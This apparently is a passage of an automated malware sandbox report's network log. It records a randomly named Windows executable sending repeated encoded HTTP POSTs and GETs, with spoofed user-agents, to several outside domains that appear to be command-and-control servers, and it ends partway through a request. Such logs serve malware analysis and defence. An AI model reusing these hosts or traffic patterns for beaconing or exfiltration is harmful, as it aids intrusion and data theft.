                                                                    Data Ascii: 1bb #MhEJ^3pSM^vb?6\gcn@$MFyRa6v5Mf.u9]x!yaH5UY'"d9aHvu\G_L]`Z:k2_;'/t8@#/zC&H?))L,d&<c0XPe(<:"/EDJrx@4]Im<(L6m0wiK>0_n4M(2?vwEQwVYbb=k}4tE=H0K.HG-D)<*Ef*Zjo1ZdVAarU0T*gV&"0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.849751185.27.134.144805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:17.300817013 CET794OUTPOST /pxvi/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.amayavp.xyz
                                                                    Origin: http://www.amayavp.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.amayavp.xyz/pxvi/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 2f 4a 5a 61 4c 69 30 45 61 52 4b 41 69 56 2b 6d 7a 68 58 47 73 62 63 42 34 35 66 42 4a 39 37 44 75 4f 73 2b 4c 7a 6b 6c 78 47 51 72 78 43 51 7a 51 62 4e 46 72 71 39 41 69 77 4c 43 6c 72 46 38 35 6a 67 4e 77 32 31 51 52 34 56 32 43 49 73 50 54 49 75 37 33 62 7a 4c 34 4c 6c 53 52 69 39 33 74 57 6b 31 65 32 6c 31 4d 42 4f 6e 6e 38 71 56 61 34 57 52 46 2f 6b 59 33 79 58 36 47 4c 4f 4c 45 76 7a 53 4e 32 30 36 38 4b 63 6d 71 70 4e 4f 2f 33 75 6d 31 6b 57 53 4a 4e 4f 77 50 4d 30 33 64 67 55 52 4d 30 61 50 36 44 59 2b 76 6b 4b 69 6e 5a 4a 50 75 75 62 73 44 73 2b 52 68 42 66 39 6b 73 76 58 7a 38 4b 4e 50 75 33 36 55 59 31 4c 78 2f 38 32 6c 45 36 36 77 39 45 64
                                                                    Data Ascii: dpy4vDKP=/JZaLi0EaRKAiV+mzhXGsbcB45fBJ97DuOs+LzklxGQrxCQzQbNFrq9AiwLClrF85jgNw21QR4V2CIsPTIu73bzL4LlSRi93tWk1e2l1MBOnn8qVa4WRF/kY3yX6GLOLEvzSN2068KcmqpNO/3um1kWSJNOwPM03dgURM0aP6DY+vkKinZJPuubsDs+RhBf9ksvXz8KNPu36UY1Lx/82lE66w9Ed
                                                                    Dec 5, 2024 09:46:18.538708925 CET685INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:18 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Content-Encoding: br
                                                                    Data Raw: 31 62 62 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 53 d0 08 13 4d f5 dc 0f 5e 76 f9 62 c0 09 3f ff db cc 06 36 d0 d9 5c b3 67 7f 82 d4 83 63 6e 8d 40 bb 24 b0 4d a7 87 46 8d 00 79 52 d3 9e 61 36 92 76 11 f6 17 18 35 ad e8 c6 4d 85 66 2e 75 39 c1 c8 5d 78 06 e0 8c 85 cf ef da f8 21 17 79 61 48 a2 0e 35 82 55 59 eb 0e 02 96 ac a1 09 27 e4 1f e2 a1 fd 9f 22 f5 64 b7 1e 39 c0 b5 61 e0 f3 9b 1a 48 00 76 8d a5 75 e3 fc 5c 0a 47 7f e5 ef e9 5f 4c e6 00 d7 f3 b9 dc 5d ea 08 95 60 99 5a c0 98 3a 88 6b d7 32 ef db 5f 3b df 27 d6 07 2f e1 8d f9 74 df 97 38 c6 15 c6 c4 bf f8 90 40 23 2f e1 cb ae 7a 43 26 ff eb 1d 48 00 e8 3f b0 e3 8c 29 29 4c 2c 64 92 a4 26 17 bc d4 3c 63 85 30 8a 89 58 e5 98 50 65 f3 b6 28 b3 3c d7 a9 b5 b6 e4 3a 13 22 2f 45 cc 44 ca 4a a6 72 e1 ca 78 40 34 c0 b2 97 0a cd 13 c3 5d e1 0a 99 49 6d 12 a6 cb 3c 8f b5 28 f2 4c 8f a4 36 13 bd 6d ec 04 30 07 f8 f7 77 69 17 4b c0 3e d2 30 c1 ae 5f df 7f 84 c6 ea f9 6e ba f4 34 4d a9 a4 8a 10 1f d7 28 32 3f [TRUNCATED]
                                                                    Data Ascii: 1bb #MhEJ^3pSM^vb?6\gcn@$MFyRa6v5Mf.u9]x!yaH5UY'"d9aHvu\G_L]`Z:k2_;'/t8@#/zC&H?))L,d&<c0XPe(<:"/EDJrx@4]Im<(L6m0wiK>0_n4M(2?vwEQwVYbb=k}4tE=H0K.HG-D)<*Ef*Zjo1ZdVAarU0T*gV&"0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.849752185.27.134.144805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:19.980600119 CET1811OUTPOST /pxvi/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.amayavp.xyz
                                                                    Origin: http://www.amayavp.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.amayavp.xyz/pxvi/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 2f 4a 5a 61 4c 69 30 45 61 52 4b 41 69 56 2b 6d 7a 68 58 47 73 62 63 42 34 35 66 42 4a 39 37 44 75 4f 73 2b 4c 7a 6b 6c 78 47 59 72 78 77 59 7a 52 38 35 46 35 61 39 41 72 51 4c 44 6c 72 46 6c 35 6a 6f 4a 77 33 4a 66 52 36 64 32 59 75 34 50 48 70 75 37 75 72 7a 4c 36 4c 6c 52 4d 53 38 33 74 57 31 79 65 32 31 31 4d 42 4f 6e 6e 39 61 56 54 4b 2b 52 65 2f 6b 5a 68 43 58 2b 56 62 4f 76 45 72 6d 6c 4e 33 41 45 2f 36 38 6d 72 4a 64 4f 38 42 43 6d 32 45 57 4d 46 74 4f 6f 50 4d 49 73 64 68 35 6f 4d 31 66 71 36 45 73 2b 69 77 4c 46 36 74 4e 58 34 74 48 70 41 76 6d 31 74 78 66 4a 71 66 6d 74 30 2b 65 7a 42 71 2f 51 53 34 4e 52 38 50 46 50 2f 69 32 36 35 39 74 6f 4c 71 58 72 6f 48 46 73 59 63 69 4b 54 43 4b 33 2b 65 37 4d 78 61 4b 4a 48 66 59 2f 6c 71 2f 4c 76 32 34 6a 72 4d 46 4f 4b 41 58 67 56 4f 34 73 4c 4f 36 6f 5a 43 42 67 39 63 62 53 76 48 66 33 58 4d 78 42 38 77 50 70 6c 77 44 67 2b 74 6c 30 57 6d 55 69 59 4c 78 55 70 4a 68 49 32 79 68 66 57 6a 6a 2b 49 73 53 59 35 34 4d 38 50 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=/JZaLi0EaRKAiV+mzhXGsbcB45fBJ97DuOs+LzklxGYrxwYzR85F5a9ArQLDlrFl5joJw3JfR6d2Yu4PHpu7urzL6LlRMS83tW1ye211MBOnn9aVTK+Re/kZhCX+VbOvErmlN3AE/68mrJdO8BCm2EWMFtOoPMIsdh5oM1fq6Es+iwLF6tNX4tHpAvm1txfJqfmt0+ezBq/QS4NR8PFP/i2659toLqXroHFsYciKTCK3+e7MxaKJHfY/lq/Lv24jrMFOKAXgVO4sLO6oZCBg9cbSvHf3XMxB8wPplwDg+tl0WmUiYLxUpJhI2yhfWjj+IsSY54M8PDlemkNTvklIfmQeWPtAw0zchq+7wrv89KSy07+7rGCWsa1WUCHp15BWB0wKaPKuYkEyzWqaTGiOCzZs4klk7bio3/0zTsX+PbimW07e0oehPCCQSAzILISRXKLwONlhzA8heTgnqSPdx9TWdb7sLaTfqj88RVtyS8jkT2MELR9z5WwcyxY0NWoG5ynWMCE8q6XLPKgCICSZ8lknIaXLwM5+DUPYBaAZuMYMhBcjKI+5/mxQBW3XCyiiSPwuGgFqdZz3pgHgN4dUCf2C/q2z8oqtZSmb0OpW6CzB4RnMLGL5rZChf5FCDD+FuOYTUa/uti9uVuejObQpuD25pN75F32Ad91yBLnWeDK25UFG9l/+3FtvzZfOuF9x6vgJISaBnmi1P7xWoerER+TcU22KNgfA63iaIkIkwHw5r9dQ8TEHAfFAgT1lqIBCxNkz912ytFBPWbasTu7GPH6T1zekRnrv3i675P6FGjMukwZKFSL3UzURcKZm172t4dciZhOv+44qPJzHXpED3j7x0Snbq7Y3NYad9JeS231qgA29ml5hNhHY4xUA7q403APaJ2bZeaXX0BsA6qKksCgHjaNmo2EpxQGF2Ce02WYdePzyy165uiFfbSK6bQIOVAqEI/dELmgk5KbywsVOAxTqdYOKIe754+cTZkFO94G [TRUNCATED]
                                                                    Dec 5, 2024 09:46:21.214456081 CET685INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:21 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Content-Encoding: br
                                                                    Data Raw: 31 62 62 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 53 d0 08 13 4d f5 dc 0f 5e 76 f9 62 c0 09 3f ff db cc 06 36 d0 d9 5c b3 67 7f 82 d4 83 63 6e 8d 40 bb 24 b0 4d a7 87 46 8d 00 79 52 d3 9e 61 36 92 76 11 f6 17 18 35 ad e8 c6 4d 85 66 2e 75 39 c1 c8 5d 78 06 e0 8c 85 cf ef da f8 21 17 79 61 48 a2 0e 35 82 55 59 eb 0e 02 96 ac a1 09 27 e4 1f e2 a1 fd 9f 22 f5 64 b7 1e 39 c0 b5 61 e0 f3 9b 1a 48 00 76 8d a5 75 e3 fc 5c 0a 47 7f e5 ef e9 5f 4c e6 00 d7 f3 b9 dc 5d ea 08 95 60 99 5a c0 98 3a 88 6b d7 32 ef db 5f 3b df 27 d6 07 2f e1 8d f9 74 df 97 38 c6 15 c6 c4 bf f8 90 40 23 2f e1 cb ae 7a 43 26 ff eb 1d 48 00 e8 3f b0 e3 8c 29 29 4c 2c 64 92 a4 26 17 bc d4 3c 63 85 30 8a 89 58 e5 98 50 65 f3 b6 28 b3 3c d7 a9 b5 b6 e4 3a 13 22 2f 45 cc 44 ca 4a a6 72 e1 ca 78 40 34 c0 b2 97 0a cd 13 c3 5d e1 0a 99 49 6d 12 a6 cb 3c 8f b5 28 f2 4c 8f a4 36 13 bd 6d ec 04 30 07 f8 f7 77 69 17 4b c0 3e d2 30 c1 ae 5f df 7f 84 c6 ea f9 6e ba f4 34 4d a9 a4 8a 10 1f d7 28 32 3f [TRUNCATED]
                                                                    Data Ascii: 1bb #MhEJ^3pSM^vb?6\gcn@$MFyRa6v5Mf.u9]x!yaH5UY'"d9aHvu\G_L]`Z:k2_;'/t8@#/zC&H?))L,d&<c0XPe(<:"/EDJrx@4]Im<(L6m0wiK>0_n4M(2?vwEQwVYbb=k}4tE=H0K.HG-D)<*Ef*Zjo1ZdVAarU0T*gV&"0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.849753185.27.134.144805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:22.649477005 CET516OUTGET /pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.amayavp.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:46:23.882405043 CET1187INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 986
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                    Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("53347c61d6f7f7a3acd15c8440c9743c");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.84975485.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:30.178348064 CET786OUTPOST /nlsy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.beythome.online
                                                                    Origin: http://www.beythome.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.beythome.online/nlsy/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 5a 6f 78 70 67 53 61 68 4e 41 54 57 52 6f 4d 6c 51 46 66 6a 58 78 30 31 78 4f 36 46 61 31 31 58 57 51 66 4c 76 74 55 69 74 57 61 4a 2b 2b 36 48 67 6e 4c 45 72 47 59 54 61 39 50 44 52 4a 47 2f 47 74 2b 64 52 51 4c 61 77 4a 30 5a 43 6b 32 64 4c 74 31 47 43 75 58 59 44 6d 52 79 59 30 4e 37 55 79 54 70 32 38 74 4f 61 2f 37 6d 30 68 30 77 4b 6f 45 2f 5a 55 30 34 50 52 72 57 43 33 55 6d 2f 4e 66 49 73 54 43 41 2f 37 30 4b 54 7a 77 43 71 6e 42 2f 62 6f 4a 59 67 76 59 6b 4f 7a 6a 79 47 66 34 62 47 72 30 69 2b 35 56 4a 6d 35 77 75 50 69 72 45 6c 4c 44 6c 54 70 41 43 56 2b 73 37 54 4e 64 76 77 6e 63 3d
                                                                    Data Ascii: dpy4vDKP=ZoxpgSahNATWRoMlQFfjXx01xO6Fa11XWQfLvtUitWaJ++6HgnLErGYTa9PDRJG/Gt+dRQLawJ0ZCk2dLt1GCuXYDmRyY0N7UyTp28tOa/7m0h0wKoE/ZU04PRrWC3Um/NfIsTCA/70KTzwCqnB/boJYgvYkOzjyGf4bGr0i+5VJm5wuPirElLDlTpACV+s7TNdvwnc=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.84975585.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:32.833400011 CET806OUTPOST /nlsy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.beythome.online
                                                                    Origin: http://www.beythome.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.beythome.online/nlsy/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 5a 6f 78 70 67 53 61 68 4e 41 54 57 51 49 38 6c 63 43 44 6a 52 52 30 32 36 75 36 46 51 56 30 51 57 51 44 4c 76 6f 30 79 75 6b 2b 4a 2b 63 79 48 68 6d 4c 45 6f 47 59 54 52 64 50 47 66 70 47 6f 47 71 32 4b 52 56 72 61 77 4a 67 5a 43 68 4b 64 4b 63 31 42 41 2b 58 61 62 57 52 77 48 6b 4e 37 55 79 54 70 32 34 4e 6f 61 2b 54 6d 30 53 38 77 4c 4b 73 77 48 6b 30 37 47 78 72 57 47 33 55 69 2f 4e 65 6c 73 52 32 75 2f 35 63 4b 54 78 34 43 72 7a 56 34 52 6f 4a 53 39 66 5a 44 50 54 6e 2f 48 50 30 44 50 62 6b 68 2b 6f 31 6d 6e 50 42 45 56 41 6a 43 6d 4c 72 4f 54 71 6f 30 51 4a 78 54 4a 75 4e 66 75 77 4c 48 71 77 46 75 4a 42 30 62 41 38 2f 59 57 33 59 76 74 74 64 59
                                                                    Data Ascii: dpy4vDKP=ZoxpgSahNATWQI8lcCDjRR026u6FQV0QWQDLvo0yuk+J+cyHhmLEoGYTRdPGfpGoGq2KRVrawJgZChKdKc1BA+XabWRwHkN7UyTp24Noa+Tm0S8wLKswHk07GxrWG3Ui/NelsR2u/5cKTx4CrzV4RoJS9fZDPTn/HP0DPbkh+o1mnPBEVAjCmLrOTqo0QJxTJuNfuwLHqwFuJB0bA8/YW3YvttdY


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.84975685.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:35.497387886 CET1823OUTPOST /nlsy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.beythome.online
                                                                    Origin: http://www.beythome.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.beythome.online/nlsy/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 5a 6f 78 70 67 53 61 68 4e 41 54 57 51 49 38 6c 63 43 44 6a 52 52 30 32 36 75 36 46 51 56 30 51 57 51 44 4c 76 6f 30 79 75 6b 32 4a 2b 4f 4b 48 68 46 7a 45 70 47 59 54 50 74 50 48 66 70 47 51 47 72 53 47 52 56 76 6b 77 4e 51 5a 43 45 47 64 44 4f 64 42 4b 2b 58 61 48 6d 52 31 59 30 4e 69 55 79 6a 74 32 38 70 6f 61 2b 54 6d 30 53 51 77 4d 59 45 77 46 6b 30 34 50 52 72 43 43 33 56 46 2f 4a 4b 62 73 52 79 51 34 49 38 4b 54 53 51 43 6d 6d 42 34 5a 6f 4a 55 38 66 5a 62 50 53 61 2f 48 50 6f 31 50 59 35 45 2b 72 6c 6d 6e 34 78 62 48 46 44 30 34 37 62 50 62 71 38 4c 59 4c 70 4b 4b 39 35 4c 6b 52 48 42 69 6c 5a 78 42 33 4d 7a 4f 4d 4c 56 56 77 51 67 70 72 6f 77 39 61 37 75 53 44 55 69 45 59 72 51 50 2b 68 41 47 42 2f 72 41 4e 36 47 71 79 77 73 67 69 35 35 2f 7a 69 7a 62 34 39 57 44 48 63 6c 7a 5a 76 5a 48 6b 31 34 32 45 72 74 78 6a 33 5a 50 39 6b 46 43 72 78 4f 76 50 6e 38 65 4a 59 4b 58 4d 38 30 58 6b 53 72 33 45 72 54 36 4d 32 55 63 66 39 75 65 4b 4b 2b 77 4b 38 4b 68 48 79 42 4c [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=ZoxpgSahNATWQI8lcCDjRR026u6FQV0QWQDLvo0yuk2J+OKHhFzEpGYTPtPHfpGQGrSGRVvkwNQZCEGdDOdBK+XaHmR1Y0NiUyjt28poa+Tm0SQwMYEwFk04PRrCC3VF/JKbsRyQ4I8KTSQCmmB4ZoJU8fZbPSa/HPo1PY5E+rlmn4xbHFD047bPbq8LYLpKK95LkRHBilZxB3MzOMLVVwQgprow9a7uSDUiEYrQP+hAGB/rAN6Gqywsgi55/zizb49WDHclzZvZHk142Ertxj3ZP9kFCrxOvPn8eJYKXM80XkSr3ErT6M2Ucf9ueKK+wK8KhHyBLRAi8rBdJi8rVRnAPWaPfi37ZR2EyDbUWZpGJJuSMSAo1Kxjw4VVmi4ipncdXWhJlqqEyBZUIO0KtJ1sLXqKk268TizFkanVOHlCtqCKebTTzf3bAe46V+sTvO2VnCOCao7zNg/BuZChWda2PqXSyDfvni3C7QjtVKEMKIiSM2I3kVl5JANgJ/bmiA6zMBwXloUuPIptNXPKtT9d5M4JL4d5m8mQP4UOC1w0GD0oKSGazgWdWz+cfReivliIaECe1CkNXd2a1buDv5Kz6qQ2Lq7Tq8vGD5rS8znHOtbGrfhcPFs8CIgYqSECFN/K2qNCqNyKtX9PYCFRLieS3XM1Z7iaDm3prplAeZpbIxxo0RN1+bU+mc6JxTJGMoCBN5NZKL496ksnZm9hSbtGnKHHOYJ2FVArwVaVFSyHBBhYYKEZQS7qfnURVZ2PZV1tVt5bHdMuyIfr+b9/0BLUIsj1CEV8SrTC1xkJ8Xyfa5rKEerhbhzMTXSQ+yypr8TgrnD7HWpFt/l7tlm5JmujiWWaeSsDvBzbIojpYfcB/cfklclF7LvP+py0VcZ1SxT8xYls+BNCdHasvn6k5EusVX6WgRydaC77Mz9StTZ102RNdjRSkteigmp9nnRsJvGlYCqI8ZJ7MIXgwqqvc+HczXaAnKKh3MXAuciwoZk [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.84975785.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:38.160312891 CET520OUTGET /nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.beythome.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:46:39.481437922 CET225INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.14.1
                                                                    Date: Thu, 05 Dec 2024 08:46:39 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    X-Rate-Limit-Limit: 5s
                                                                    X-Rate-Limit-Remaining: 19
                                                                    X-Rate-Limit-Reset: 2024-12-05T08:46:44.2627996Z


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.849758154.23.184.207805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:45.150978088 CET768OUTPOST /e60d/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.d48dk.top
                                                                    Origin: http://www.d48dk.top
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.d48dk.top/e60d/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
